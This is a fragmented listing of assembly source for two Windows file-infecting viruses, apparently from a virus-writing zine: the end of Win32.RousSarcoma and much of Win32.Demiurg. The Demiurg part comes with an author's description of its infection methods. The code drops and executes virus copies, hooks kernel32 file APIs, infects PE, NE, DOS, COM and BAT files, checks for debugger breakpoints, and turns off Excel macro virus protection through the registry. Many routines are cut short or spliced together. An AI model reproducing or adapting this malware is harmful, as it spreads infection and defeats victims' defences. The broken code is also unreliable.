; ###########################################################################/\
; ////////////////////////////////////////////////////////////////////////////\
; \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
;
SecondPart:
; Here do we drop the entire file from the
; infected goat and execute it
; ***************************************************************************
; -------------------------[ Search for Kernel ]-----------------------------
; ***************************************************************************
call Delta
Delta:
pop ebp
sub ebp, offset Delta
; ***************************************************************************
; --------------------[ Search-Kernel Procedure ]----------------------------
; ***************************************************************************
GetKernel:
mov byte ptr [ebp+K32Trys], 5h
GK1:
cmp byte ptr [ebp+K32Trys], 00h
jz NoKernel ; did we pass the limit ?
GK2:
sub esi, 10000h ; search next page
dec byte ptr [ebp+K32Trys]
jmp GK1 ; test again
CheckPE: ; test for PE-Header
mov edi, [esi+3Ch]
add edi, esi
call CheckPESign
CheckDLL:
add edi, 16h
mov bx, word ptr [edi] ; get characteristics
and bx, 0F000h ; to check for dll flag
cmp bx, 02000h
jne GK2
KernelFound: ; We got it !
sub edi, 16h ; edi = PE-Header
xchg eax, edi ; eax = PE offset
xchg ebx, esi ; ebx = MZ offset
clc ; clear carriage flag
ret
NoKernel:
stc ; set carriage flag if we did not found it
ret
; ***************************************************************************
; ---------------------------[ Search for API's ]----------------------------
; ***************************************************************************
LL db 'LoadLibraryA', 0h
GPA db 'GetProcAddress', 0h
; ***************************************************************************
; --------[ Search the kernel export table for the 2 main API's ]------------
; ***************************************************************************
SearchAPI1:
and word ptr [ebp+counter], 0h
SearchNextApi1:
push esi
lodsd
add eax, [ebp+MZAddy]
cld
rep cmpsb ; check for api name
pop ecx
jz FoundApi1
FoundApi1:
pop esi
movzx eax, word ptr [ebp+counter]
shl eax, 1h ; get right entry
NotFoundApi1:
xor eax, eax ; we failed :(
ret
; ***************************************************************************
; ----------------------[ Let's drop the virus to a file ]-------------------
; ***************************************************************************
DropIT:
push 0
push 080h ; normal
push 1 ; new file
push 0
push 0
push 40000000h ; write access
lea eax, [ebp+HiddenFile]
push eax
call dword ptr [ebp+YCreateFileA]
push 0 ; overlapped
lea ecx, [ebp+Write] ; written bytes
push ecx
push VirusSize ; Lenght
push esi ; Start of Data
push ebx ; File Handle
Call dword ptr [ebp+YWriteFile]
push ebx
call dword ptr [ebp+YCloseHandle]
; ***************************************************************************
; -----------------------[ open original program ]---------------------------
; ***************************************************************************
ExecuteHost:
add eax,12345678h
org $-4
retBas dd 0h
jmp eax
OldEIP dd 0h
OldBase dd 0h
NewEIP dd 0h
; ***************************************************************************
; --------------[ use GetProcAddress to retrieve API's ]---------------------
; ***************************************************************************
; this procedure is used in both parts of the virus !
; esi point to the names
; edi to the place where we save the offsets
; ebx contains module handle
; ecx got the number of api's
GetAPI3:
push ecx ; save number
API3b:
call GetProcAddress
API3c:
stosd ; save offset
pushad
cmp eax, 0 ; Lets do a check for Softice Breakpoints
je NoSICheck
cmp byte ptr [eax], 0CCh ; check for the breakpoint
je EndApi3 ; due to the pushad, we will ret somewhere strange ;)
NoSICheck:
popad
pop ecx
dec ecx
jz EndApi3
SearchZero:
cmp byte ptr [esi], 0h
je GotZero
inc esi
jmp SearchZero
GotZero:
inc esi
pop ecx
jmp GetAPI3 ; get next api
EndApi3:
ret
; ###########################################################################
; ----------------------[ Third Part - The Data ]----------------------------
; ###########################################################################
; ***************************************************************************
; ---------------------[ Data of the second part ]---------------------------
; ***************************************************************************
NumberOf2Kernel32APIS equ 4
Kernel32Names2:
db 'CreateFileA', 0
db 'CloseHandle', 0
db 'WriteFile',0
db 'CreateProcessA',0
; ***************************************************************************
; ---------------------------[ Some Data ]-----------------------------------
; ***************************************************************************
VirusEnd:
StartofVirusinFile dd 0h
Write dd 0h
; ***************************************************************************
; --------------------[ Initialized First Part Data ]------------------------
; ***************************************************************************
.DATA
CopyRight db 'Win32.RousSarcoma by SnakeByte',0
db 'FindFirstFileA', 0
db 'FindNextFileA', 0
db 'FindClose', 0
db 'CreateFileA', 0
db 'CloseHandle', 0
db 'CreateFileMappingA', 0
db 'MapViewOfFile', 0
db 'UnmapViewOfFile', 0
db 'GetCommandLineA',0
db 'ReadFile',0
db 'CreateProcessA',0
db 'GetSystemDirectoryA',0
db 'CopyFileA',0
db 'GetCurrentProcessId',0
db 'RegisterServiceProcess',0
db 'GetCurrentDirectoryA',0
db 'SetCurrentDirectoryA',0
db 'GetWindowsDirectoryA',0
db 'GetFullPathNameA',0
db 'WritePrivateProfileStringA',0
db 'WriteFile',0
advname db 'advapi32',0
AdvapiNames:
NumberOfAdvapiAPIS equ 6
db 'RegOpenKeyExA',0
db 'RegQueryValueExA',0
db 'RegCloseKey',0
db 'RegSetValueExA',0
db 'RegCreateKeyExA',0
db 'RegEnumKeyA',0
StartupInfo:
db 64d
db 63d dup (0)
ProcessInformation:
hProcess dd 0h
hThread dd 0h
dwProcessId dd 0h
dwThreadId dd 0h
; ***************************************************************************
; -------------------[ Uninitialized First Part Data ]-----------------------
; ***************************************************************************
.DATA?
; API's we need for first Part
XFindFirstFileA dd ?
XFindNextFileA dd ?
XFindClose dd ?
XCreateFileA dd ?
XCloseHandle dd ?
XCreateFileMappingA dd ?
XMapViewOfFile dd ?
XUnmapViewOfFile dd ?
XGetCommandLineA dd ?
XReadFile dd ?
XCreateProcessA dd ?
XGetSystemDirectoryA dd ?
XCopyFileA dd ?
XGetCurrentProcessId dd ?
XRegisterServiceProcess dd ?
XGetCurrentDirectoryA dd ?
XSetCurrentDirectoryA dd ?
XGetWindowsDirectoryA dd ?
XGetFullPathNameA dd ?
XWritePrivateProfileStringA dd ?
XWriteFile dd ?
FileHandle dd ? ; Filehandle
MapHandle dd ? ; Handle of the Map
MapAddress dd ? ; Offset of the Map
Handle dd ?
InfCounter db ? ; Counter
FindHandle dd ? ; Handle for FindFirstFile API
FileBuffer db VirusSize dup (?)
; We temporarily save the name of a possible AV
; to check if it is one
NameBuffer db 255d dup (?)
CurrentPath db 255d dup (?)
; ***************************************************************************
; ------------------------[ That's all, go home ]----------------------------
; ***************************************************************************
end Virus
Note of the editor:
Being my intention post the source code of this virus here, due to his
complexity that's not possible. You will find source code in "Binaries"
folder.
VirusBuster/29A
; *************************************************************************
; ******************** ********************
; ******************** Win32.Demiurg ********************
; ******************** by ********************
; ******************** Black Jack ********************
; ******************** ********************
; *************************************************************************
comment ~
NAME: Win32.Demiurg
AUTHOR: Black Jack [independant Austrian Win32asm virus coder]
CONTACT: Black_Jack_VX@hotmail.com | http://www.coderz.net/blackjack
TYPE: Win32 global resident (in kernel32.dll) PE/NE/MZ/COM/BAT/XLS infector
SIZE: 16354 bytes
DESCRIPTION:
The main instance of the virus is in infected PE EXE files (or the PE
dropper). If such a file is executed, the first thing the virus does is
getting the needed API addresses by standart methods (first it scans the
hosts import table for the GetModuleHandleA API and uses it to get the
KERNEL32 handle if found, if not, it gets it by the "scan down from the
value from the top of stack"-trick, then the export table of KERNEL32 is
scanned for all needed APIs, finally also ADVAPI32.dll is loaded and some
APIs for registry operations fetched from there). Then the virus performs
two tasks before returning to the host: first infected KERNEL32.dll, then
infected MS-Excel.
To infect Excel, the virus checks the registry if a supported version (97 or
2000) is installed; if so, it turns the macro virus protection off and gets
the path where it is installed. Then it drops a .xls file with a little macro
as \xlstart\demiurg.xls; this file will be loaded automatically at the next
start of excel, and the macro executed. Besides that, another macro source
code is generated as C:\demiurg.sys file, that contains VBA instructions to
write the virus PE dropper to C:\demiurg.exe and execute it. Please note that
this macro uses 100% VBA instructions (the binary data is stored in Arrays),
no stupid debug scripts. This file will be used to infect regular .xls files
with. This means that the VBA instance of the virus is not a "full" macro
virus, because it is not able to replicate from one .xls file to another
directly.
After the KERNEL32.dll infection, the virus will stay resident after the next
reboot. It then catches most file API functions and infects COM, EXE (MZ, NE,
PE) and BAT files as they are accessed.
The PE EXE infection process is quite standart: The last section is increased,
and the virus body is appended after the virtual end of the section. In my
opinion this is much more logical than appending after the physical end, how
it is done in most Win32 virii nowadays, because otherwise the virus body can
be overwritten by host data (if the last section is the .bss section, for
example). Besides that the virtual size is not aligned (although some
compilers/assemblers like TASM align it to SectionAlign, this is not
necessary), while the physical size is always aligned to FileAlign; this
means we can save some space in some cases. Then the entry point is set to
the virus body (in case of PE EXE files) and finally also the imagesize and
the checksum (in case it was different to zero before infection) are updated
to maintain compatiblity to WinNT; to recalculate the CRC the
CheckSumMappedFile API from IMAGEHLP.dll is used.
All other infectable files are only infected "indirectly": A small piece of
code is added that drops a PE dropper and infects it. Because of that the
virus can only replicate in Win32 enviroments, although it infects a lot of
different filetypes.
DOS EXE files are also infected in standart manner: some code is appended at
the end of file, then the entrypoint and the stack are set to it, and the
internal filesize is recalculated. Sligtly interesting is that the virus is
able to infect files with internal overlays that were generated with borland
compilers, in this case the virus is appended between the internal end of the
file and the overlay, after the overlay has been shifted back. This works
very fine (to my own surprise); try to infect TD.EXE for example.
BAT files are infected by adding some BAT code at the end of the file, then
the the character 1Ah (end of text file; BAT files will be only executed
until this character is reached), and after that the PE dropper. The BAT code
works by ECHOing out a small COM file (which was been written in such a
careful way that it only contains characters that are legit in BAT files) to
C:\DEMIURG.EXE. Then this file is executed with the name of the BAT file as
parameter. Then the COM file reads the PE dropper from the end of the BAT
file and writes it to C:\DEMIURG.EXE too, and then executes the new file.
NE files are infected with the method that was introduced by Mark Ludwig (I
think): The code segment that contains the entry point is increased, the rest
of the file is shifted back and the NE header tables are fixed to reflect the
new layout of the file. Then a small piece of code is injected into the newly
gained room and the entrypoint set to it; besides that the PE dropper is
appended at the end of the file as internal overlay.
ASSEMBLE WITH:
tasm32 /mx /m demiurg.asm
tlink32 /Tpe /aa demiurg.obj,,, import32.lib
~
; ===========================================================================
Extrn ExitProcess:Proc
Extrn MessageBoxA:Proc
.386
.model flat
.data
start:
db 68h ; push imm32
orig_eip dd offset dummy_host ; push host entry point
search_kernel32_descriptor:
mov esi, [ebx+12] ; ESI=name of library RVA
or esi, esi ; last import descriptor ?
JZ failed ; if yes, we failed
add esi, eax ; ESI=name of library VA
lea edi, [ebp+offset kernel32name] ; EDI=name of kernel32 VA
mov ecx, 8 ; ECX=length to compare
cld ; clear direction flag
rep cmpsb ; compare the two strings
JE found_kernel32_descriptor ; if equal, we found it
found_kernel32_descriptor:
xor edx, edx ; EDX=0 - our counter
push dword ptr [ebx+16] ; RVA of array of API RVAs
mov ebx, [ebx] ; EBX=array of API name ptrs
or ebx, ebx ; are there APIs imported ?
JZ pop_failed ; if not, we failed
add ebx, eax ; EBX=RVA API name ptrs array
search_GetModuleHandle:
mov esi, [ebx] ; ESI=RVA of a API name
or esi, esi ; searched all API names?
JZ pop_failed ; if yes, we failed
test esi, 80000000h ; is it an ordinal ?
JNZ next_API ; can't handle ordinal imports
add esi, eax ; ESI=VA of API name
inc esi ; skip the ordinal hint
inc esi
lea edi, [ebp+offset GetModuleHandleA] ; EDI=VA of GetModuleHandleA
mov ecx, l_GMH ; ECX=length GetModuleHandleA
cld ; clear direction flag
rep cmpsb ; compare the two strings
JE found_GetModuleHandle
next_API:
inc edx ; increment our API counter
inc ebx ; EBX=ptr to next API name ptr
inc ebx
inc ebx
inc ebx
JMP search_GetModuleHandle ; try next API name
found_GetModuleHandle:
pop ebx ; EBX=RVA of array of API RVAs
add ebx, eax ; EBX=VA of array of API RVAs
mov ebx, [ebx+edx*4] ; EBX=GetModuleHandleA entry
pop_failed:
pop ebx ; remove shit from stack
call infect_kernel32
call infect_excel
push 260
lea eax, [ebp+offset path_buffer1]
push eax
call [ebp+offset GetSystemDirectoryA] ; get the Windows System dir
hook_APIs_loop:
call hook_API ; hook this API
next_hook_API_loop:
inc eax ; search end of string
cmp byte ptr [eax+1], 0
JNE next_hook_API_loop
next_API_name:
inc eax ; EAX=next API name
inc eax
xchg esi, eax ; ESI=next API name
finish_kernel32_infection:
hook_API:
push ebx ; save registers
push ecx
push esi
search_section:
mov esi, [ebx+0Ch] ; ESI=section RVA
cmp esi, edx
JA next_section
add esi, [ebx+8] ; add section virtual size
cmp esi, edx
JA found_section
next_section:
add ebx, 40 ; 40 = section header size
LOOP search_section
section_not_found:
JMP exit_hook_API
found_section:
sub edx, [ebx+0Ch] ; section RVA
add edx, [ebx+14h] ; start of raw data
; EDX=physical offset of
; API RVA in K32 export table
add edx, [ebp+offset mapbase] ; EDX=address in memmap
exit_hook_API:
add edi, API_hook_size ; EDI=next API hook
pop esi
pop ecx
pop ebx
RET
API_hooks:
CreateFileA_hook:
push 12345678h
JMP hookA
CreateFileW_hook:
push 12345678h
JMP hookW
GetFileAttributesA_hook:
push 12345678h
JMP hookA
GetFileAttributesW_hook:
push 12345678h
JMP hookW
SetFileAttributesA_hook:
push 12345678h
JMP hookA
SetFileAttributesW_hook:
push 12345678h
JMP hookW
CopyFileA_hook:
push 12345678h
JMP hookA
CopyFileW_hook:
push 12345678h
JMP hookW
MoveFileExA_hook:
push 12345678h
JMP hookA
MoveFileExW_hook:
push 12345678h
JMP hookW
MoveFileA_hook:
push 12345678h
JMP hookA
MoveFileW_hook:
push 12345678h
JMP hookW
_lopen_hook:
push 12345678h
hookA:
pushf
pusha
call hookA_next
hookA_next:
pop ebp
sub ebp, offset hookA_next
hookW:
pushf
pusha
call hookW_next
hookW_next:
pop ebp
sub ebp, offset hookW_next
pop edi
call infect
WideCharToMultiByte_failed:
popa
popf
RET
try_excel:
; Open the RegKey with the
; MS-Excel Options
lea eax, [ebp+offset reg_handle1] ; offset registry handle
push eax
push 2 ; access: KEY_SET_VALUE
push 0 ; reserved
lea eax, [ebp+offset regkey] ; which regkey
push eax
push 80000001h ; HKEY_CURRENT_USER
call [ebp+offset RegOpenKeyExA]
or eax, eax ; success=>EAX=0
JZ found_excel
found_excel:
cmp [ebp+office_version_number], "9" ; which version found ?
JE unprotect_Excel2K
unprotect_Excel97:
lea eax, [ebp+offset reg_handle2] ; offset registry handle
push eax
push 2 ; access: KEY_SET_VALUE
push 0 ; reserved
lea eax, [ebp+offset subkey_97] ; which regkey
push eax
push dword ptr [ebp+offset reg_handle1] ; registry handle
call [ebp+offset RegOpenKeyExA]
or eax, eax ; success=>EAX=0
JNZ failure
unprotect_Excel2K:
lea eax, [ebp+offset regvalue_dword] ; disposition (uninteresting)
push eax
lea eax, [ebp+offset reg_handle2] ; offset registry handle
push eax
push 0 ; security attributes
push 6 ; access: KEY_SET_VALUE and
; KEY_CREATE_SUB_KEY
push 0 ; REG_OPTION_NON_VOLATILE
push 0 ; address of class string
push 0 ; reserved
lea eax, [ebp+offset subkey_2K] ; which regkey
push eax
push dword ptr [ebp+offset reg_handle1] ; registry handle
call [ebp+RegCreateKeyExA]
or eax, eax
JNZ failure
general_unprotect:
; Now disable the MS-Excel
; macro virus protection.
push 4 ; size of buffer
lea eax, [ebp+offset regvalue_dword] ; address of buffer
push eax
push 4 ; REG_DWORD
push 0 ; reserved
push edx ; offset value name
push [ebp+reg_handle2] ; reg handle
call [ebp+offset RegSetValueExA]
or eax, eax
JNZ failure
mov byte ptr [ebp+sub_name], "b" ; name of the first VBA sub
build_subs_loop:
push esi ; save ESI
push_0:
push 0
build_lines_loop:
push ecx ; save number of lines left
build_nubers_loop:
push ecx ; save ECX
xor eax, eax ; EAX=0
lodsb ; AL=one byte from dropper
mov ecx, 3 ; ECX=3 (nuber of digits)
number_loop_head:
xor edx, edx ; EDX=0 (high dword for div)
mov ebx, 10 ; EBX=10
div ebx ; EDX=mod, EAX=div
add dl, '0' ; DL=one digit
push edx ; save it
LOOP number_loop_head
dec edi
failure:
RET
; ----- INFECT FILE ---------------------------------------------------------
infect:
push edi
pop edx
infect_bat:
call openfile ; open and map the victim
JC quit_infect_error ; opening/mapping failed ?
infect_exe_com:
call openfile ; open and map the victim
JC quit_infect_error ; opening/mapping failed ?
infect_com:
mov ecx, [ebp+offset filesize] ; ECX=size of victim file
mov esi, ecx
dec esi
add esi, [ebp+offset mapbase] ; ESI=end of file in memmap
mov edi, esi
add edi, 32
std
rep movsb ; shift whole file back
infect_exe:
cmp word ptr [eax+12h], "JB" ; already infected?
JE already_infected
mov word ptr [eax+12h], "JB" ; mark as infectd
dos_exe:
mov bx, [eax+0Eh] ; save relo_SS
mov [ebp+relo_SS], bx
mov bx, [eax+10h] ; save SP_start
mov [ebp+SP_start], bx
mov bx, [eax+14h] ; save IP_start
mov [ebp+IP_start], bx
mov bx, [eax+16h] ; save relo_CS
mov [ebp+relo_CS], bx
with_overlay:
mov esi, [ebp+offset mapbase]
cmp dword ptr [eax+esi], "VOBF" ; internal overlay of borland?
JE infectable_overlay
cmp word ptr [eax+esi+3], "SN" ; ENUNS COM file converted
; by us before?
JNE abort_infection
infectable_overlay:
mov ecx, [ebp+filesize] ; shift internal overlay back
mov esi, ecx
sub ecx, eax
dec esi
add esi, [ebp+mapbase]
mov edi, esi
add edi, (((size_dos_virus_code+15+dropper_size)/16)*16)
std
rep movsb
no_internal_overlays:
add dword ptr [ebp+filesize], (((size_dos_virus_code+15+dropper_size)/16)*16)
add dword ptr [ebp+dos_exe_size], (((size_dos_virus_code+15+dropper_size)/16)*16)
JMP abort_infection
; ----- IT IS A NEW EXE FILE ------------------------------------------------
new_exe:
mov ebx, [eax+3Ch] ; EBX=new header offset
add ebx, eax ; EBX=new header in memmap
infect_NE:
mov edi, [ebp+offset filename_ofs]
mov esi, edi
search_pure_filename:
cmp byte ptr [edi], "\"
JNE no_backslash
mov esi, edi
no_backslash:
cmp byte ptr [edi], 0
JE found_end_filename
inc edi
JMP search_pure_filename
found_end_filename:
inc esi
lea edi, [ebp+offset our_filename]
cld
movsd
movsd
movsd
push ecx
mov cl, [ebp+offset shift_value]
shl edi, cl ; start of segment in bytes
pop ecx
pop edi
push edi
add edi, [ebp+offset mapbase]
lea esi, [ebp+offset NE_virus_code]
mov ecx, ebx
cld
rep movsb
segment_loop_head:
movzx eax, word ptr [esi] ; EAX=offset of resource
db 0C1h, 0E0h ; shl eax, imm8
shift_value db ?
cmp eax, edx ; resource ofs > virus start?
JL segment_ok
add word ptr [esi], bx ; fix up resource offset
segment_ok:
add esi, 8
LOOP segment_loop_head
resources_loop_head:
cmp word ptr [esi], 0 ; end of TypeInfo table?
JE done_resources
NameInfo_loop_head:
movzx eax, word ptr [edi] ; EAX=offset of resource
db 0C1h, 0E0h ; shl eax, imm8
shift_value2 db ?
JMP abort_infection
infect_PE:
push ebx ; save PE header pointer
openfile:
mov [ebp+offset filename_ofs], edx
stc
ret
get_attribs_ok:
push 80h ; normal attributes
push dword ptr [ebp+offset filename_ofs]
call [ebp+offset SetFileAttributesA]
or eax, eax
JNZ kill_attribs_ok
stc
ret
kill_attribs_ok:
push 0 ; template file (shit)
push 80h ; file attributes (normal)
push 3 ; open existing
push 0 ; security attributes (shit)
push 0 ; do not share file
push 0C0000000h ; read/write mode
push dword ptr [ebp+offset filename_ofs] ; pointer to filename
call [ebp+offset CreateFileA]
mov [ebp+filehandle], eax
inc eax ; EAX= -1 (Invalid handle val)
JNZ open_ok
stc
ret
open_ok:
lea eax, [ebp+offset LastWriteTime]
push eax
sub eax, 8
push eax
sub eax, 8
push eax
push dword ptr [ebp+offset filehandle]
call [ebp+offset GetFileTime]
or eax, eax
JNZ get_time_ok
call closefile
stc
ret
get_time_ok:
push 0 ; high filesize dword ptr
push dword ptr [ebp+offset filehandle]
call [ebp+offset GetFileSize]
mov [ebp+offset filesize], eax
inc eax
JNZ get_filesize_ok
call closefile
stc
ret
get_filesize_ok:
add eax, workspace-1
JMP mapfile
createfile:
mov [ebp+offset filename_ofs], edx
stc
RET
createfile_ok:
mov dword ptr [ebp+offset attributes], 80h
mapfile:
push 0 ; name file mapping obj (shit)
push eax ; low dword of filesize
push 0 ; high dword of filesize
push 4 ; PAGE_READWRITE
push 0 ; security attributes (shit)
push dword ptr [ebp+offset filehandle]
call [ebp+offset CreateFileMappingA]
mov [ebp+offset maphandle], eax
or eax, eax ; close?
JNZ createfilemapping_ok
call closefile
stc
RET
createfilemapping_ok:
push 0 ; map the whole file
push 0 ; low dword of fileoffset
push 0 ; high dword of fileoffset
push 2 ; read/write access
push dword ptr [ebp+offset maphandle]
call [ebp+offset MapViewOfFile]
mov [ebp+offset mapbase], eax
or eax, eax
JNZ mapfile_ok
call closemaphandle
stc
RET
mapfile_ok:
push eax
xchg edi, eax
add edi, [ebp+offset filesize]
xor eax, eax
mov ecx, workspace
rep stosb
pop eax
clc
RET
closemap:
push dword ptr [ebp+offset mapbase]
call [ebp+offset UnmapViewOfFile]
closemaphandle:
push dword ptr [ebp+offset maphandle]
call [ebp+offset CloseHandle]
closefile:
lea eax, [ebp+offset LastWriteTime]
push eax
sub eax, 8
push eax
sub eax, 8
push eax
push dword ptr [ebp+offset filehandle]
call [ebp+offset SetFileTime]
RET
append_PE:
movzx ecx, word ptr [ebx+6] ; ECX=number of sections
dec ecx ; ECX=number of last section
RET
finish_PE_infection:
end_finish_PE_infection:
RET
GetAPIs:
get_APIs_loop:
push ecx ; save number of APIs
push eax ; save module base address
push edi ; save pointer to address tbl
next_API_loop:
inc esi ; go to next byte
cmp byte ptr [esi], 0 ; reached end of API name?
JNE next_API_loop ; if not, search on
inc esi ; ESI=next API name
RET
My_GetProcAddress:
mov ebx, eax ; EBX=module base address
add ebx, [eax+3Ch] ; EBX=new exe header
mov ebx, [ebx+78h] ; EBX=export directory RVA
add ebx, eax ; EBX=export directory VA
xor ecx, ecx ; ECX=0 (counter)
mov edx, [ebx+18h] ; EDX=NumberOfNames
mov edi, [ebx+20h] ; EDI=AddressOfNames array RVA
add edi, eax ; EDI=AddressOfNames array VA
search_loop:
pusha ; save all registers
mov edi, [edi+ecx*4] ; EDI=RVA of current API name
add edi, eax ; EDI=VA of current API name
cmp_loop:
lodsb ; get a byte from our API name
cmp byte ptr [edi], al ; is this byte equal?
JNE search_on_API ; if not, this isn't our API
inc edi ; compare next byte
or al, al ; reached end of API name ?
JNE cmp_loop ; if not, go on with compare
JMP found_API ; if yes, we found our API!
search_on_API:
popa ; restore all registers
inc ecx ; try the next exported API
cmp ecx, edx ; end of exported APIs?
JL search_loop ; if yes, try the next one
API_not_found:
popa ; restore all regisers
stc ; indicate error with carry
RET
found_API:
popa ; restore all registers
mov edx, [ebx+24h] ; EDX=AddressOfOrdinals RVA
add edx, eax ; EDX=AddressOfOrdinals VA
movzx ecx, word ptr [edx+ecx*2] ; ECX=our API's ordinal
mov edx, [ebx+1Ch] ; EDX=AddressOfFunctions RVA
lea edx, [edx+ecx*4] ; EDX=RVA of RVA of API
clc ; successful, clear carry
RET
decompress:
add ebx, esi ; EBX=pointer to end of
; compressed data
cld ; clear direction flag
loop_head:
lodsb ; get a byte from compr. data
cmp al, 'æ' ; is it our special byte?
JNE store ; if not, just treat it normal
xor eax, eax ; EAX=0
lodsb ; EAX=number of repetitions
xchg eax, ecx ; ECX=number of repetitions
lodsb ; AL=byte to store repetively
rep stosb ; store the byte repetively
JMP go_on ; go on with the next byte
store:
stosb ; simply store the byte
go_on:
cmp ebx, esi ; reached the end?
JA loop_head ; if not, just decompress on
RET
create_dropper:
pusha ; save all registers
mov dword ptr [ebp+orig_eip], 401060h ; set EntryRVA for dummy PE
mov dword ptr [ebp+imagebase], 400000h ; set ImageBase for dummy PE
dos_virus_code:
db 060h, 01Eh, 006h, 0E8h, 000h, 000h, 05Dh, 081h
db 0EDh, 006h, 001h, 08Ch, 0D8h, 048h, 08Eh, 0D8h
db 08Bh, 01Eh, 003h, 000h, 081h, 0EBh, 000h, 00Eh
db 0B4h, 04Ah, 0CDh, 021h, 00Eh, 01Fh, 08Ch, 0C0h
db 089h, 086h, 07Eh, 001h, 00Eh, 007h, 0B4h, 03Ch
db 033h, 0C9h, 08Dh, 096h, 06Bh, 001h, 0CDh, 021h
db 093h, 0B4h, 040h, 0B9h
dw dropper_size
db 08Dh, 096h
db 088h, 001h, 0CDh, 021h, 0B4h, 03Eh, 0CDh, 021h
db 0B8h, 000h, 04Bh, 08Dh, 09Eh, 07Ah, 001h, 08Dh
db 096h, 06Bh, 001h, 0CDh, 021h, 007h, 01Fh, 08Ch
db 0C0h, 005h, 010h, 000h, 001h, 086h, 069h, 001h
db 001h, 086h, 05Eh, 001h, 061h, 068h
relo_SS dw ?
db 0FAh, 017h, 0BCh
SP_start dw ?
db 0FBh, 0EAh
IP_start dw ?
relo_CS dw ?
db 043h, 03Ah, 05Ch, 044h, 045h
db 04Dh, 049h, 055h, 052h, 047h, 02Eh, 045h, 058h
db 045h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh
size_dos_virus_code EQU ($ - dos_virus_code)
bat_virus_code:
db "@echo off", 0Dh, 0Ah
db "set overlay=%0", 0Dh, 0Ah
db "if not exist %overlay% set overlay=%0.BAT", 0Dh, 0Ah
db "echo "
db ">C:\DEMIURG.EXE"
db 0Dh, 0Ah
db "C:\DEMIURG.EXE %overlay%", 0Dh, 0Ah
db "set overlay=", 0Dh, 0Ah
db 1Ah ; end of text file
NE_virus_code:
db 060h, 01Eh, 006h, 0E8h, 000h, 000h, 05Eh, 081h
db 0C6h, 094h, 000h, 08Ch, 0C0h, 00Eh, 01Fh, 016h
db 007h, 0FCh, 0B9h, 02Eh, 000h, 081h, 0ECh, 02Eh
db 002h, 08Bh, 0ECh, 08Bh, 0FDh, 0F3h, 0A4h, 016h
db 016h, 007h, 01Fh, 089h, 046h, 004h, 0B8h, 002h
db 03Dh, 08Dh, 056h, 021h, 0CDh, 021h, 072h, 05Fh
db 093h, 0B8h, 002h, 042h, 0B9h, 0FFh, 0FFh, 0BAh
dw -dropper_size
db 0CDh, 021h, 089h, 05Eh, 00Eh, 0B4h
db 03Ch, 033h, 0C9h, 08Dh, 056h, 012h, 0CDh, 021h
db 072h, 03Eh, 089h, 046h, 010h, 0B9h
dw (dropper_size/512)
db 051h, 0B4h, 03Fh, 08Bh, 05Eh, 00Eh, 0B9h, 000h
db 002h, 08Dh, 056h, 02Eh, 0CDh, 021h, 0B4h, 040h
db 08Bh, 05Eh, 010h, 0B9h, 000h, 002h, 08Dh, 056h
db 02Eh, 0CDh, 021h, 059h, 0E2h, 0E2h, 0B4h, 03Eh
db 08Bh, 05Eh, 00Eh, 0CDh, 021h, 0B4h, 03Eh, 08Bh
db 05Eh, 010h, 0CDh, 021h, 0B8h, 000h, 04Bh, 08Bh
db 0DDh, 08Dh, 057h, 012h, 0CDh, 021h, 0EBh, 007h
db 0B4h, 03Eh, 08Bh, 05Eh, 00Eh, 0CDh, 021h, 081h
db 0C4h, 02Eh, 002h, 007h, 01Fh, 061h, 068h
NE_start_IP dw 0
db 0C3h, 000h, 000h, 080h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 043h, 03Ah, 05Ch, 044h
db 045h, 04Dh, 049h, 055h, 052h, 047h, 02Eh, 045h
db 058h, 045h, 000h
our_filename db 13 dup(0)
size_NE_virus_code EQU ($ - NE_virus_code)
dummy_PE:
db 04Dh, 05Ah, 040h, 000h, 001h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 001h, 0E6h, 005h, 000h
db 042h, 04Ah, 000h, 000h, 0F0h, 0FFh, 040h, 0E6h
db 023h, 000h, 040h, 000h, 000h, 000h, 050h, 045h
db 000h, 000h, 04Ch, 001h, 001h, 0E6h, 00Dh, 000h
db 0E0h, 000h, 08Eh, 081h, 00Bh, 001h, 0E6h, 00Eh
db 000h, 068h, 010h, 0E6h, 00Ch, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 001h, 0E6h, 007h, 000h, 003h, 000h, 00Ah, 0E6h
db 006h, 000h, 060h, 000h, 000h, 000h, 002h, 0E6h
db 006h, 000h, 002h, 0E6h, 005h, 000h, 010h, 000h
db 000h, 020h, 0E6h, 004h, 000h, 010h, 000h, 000h
db 010h, 0E6h, 006h, 000h, 010h, 0E6h, 00Ch, 000h
db 010h, 000h, 000h, 054h, 0E6h, 073h, 000h, 02Eh
db 064h, 065h, 06Dh, 069h, 075h, 072h, 067h, 000h
db 050h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 042h, 000h, 000h, 000h, 002h, 0E6h, 00Eh, 000h
db 060h, 000h, 000h, 0E0h, 0E6h, 0A0h, 000h, 028h
db 010h, 0E6h, 00Ah, 000h, 038h, 010h, 000h, 000h
db 030h, 010h, 0E6h, 016h, 000h, 046h, 010h, 0E6h
db 006h, 000h, 046h, 010h, 0E6h, 006h, 000h, 04Bh
db 045h, 052h, 04Eh, 045h, 04Ch, 033h, 032h, 02Eh
db 064h, 06Ch, 06Ch, 0E6h, 004h, 000h, 045h, 078h
db 069h, 074h, 050h, 072h, 06Fh, 063h, 065h, 073h
db 073h, 0E6h, 00Dh, 000h, 06Ah, 000h, 0FFh, 015h
db 030h, 010h, 040h, 000h
dummy_PE_size EQU ($ - dummy_PE)
macro_dropper:
db 0D0h, 0CFh, 011h, 0E0h, 0A1h, 0B1h, 01Ah, 0E1h
db 0E6h, 010h, 000h, 03Eh, 000h, 003h, 000h, 0FEh
db 0FFh, 009h, 000h, 006h, 0E6h, 00Bh, 000h, 001h
db 000h, 000h, 000h, 001h, 0E6h, 008h, 000h, 010h
db 000h, 000h, 002h, 000h, 000h, 000h, 002h, 000h
db 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 0E6h, 008h
db 000h, 0E6h, 0FFh, 0FFh, 0E6h, 0B1h, 0FFh, 0FDh
db 0FFh, 0FFh, 0FFh, 009h, 000h, 000h, 000h, 013h
db 000h, 000h, 000h, 004h, 000h, 000h, 000h, 005h
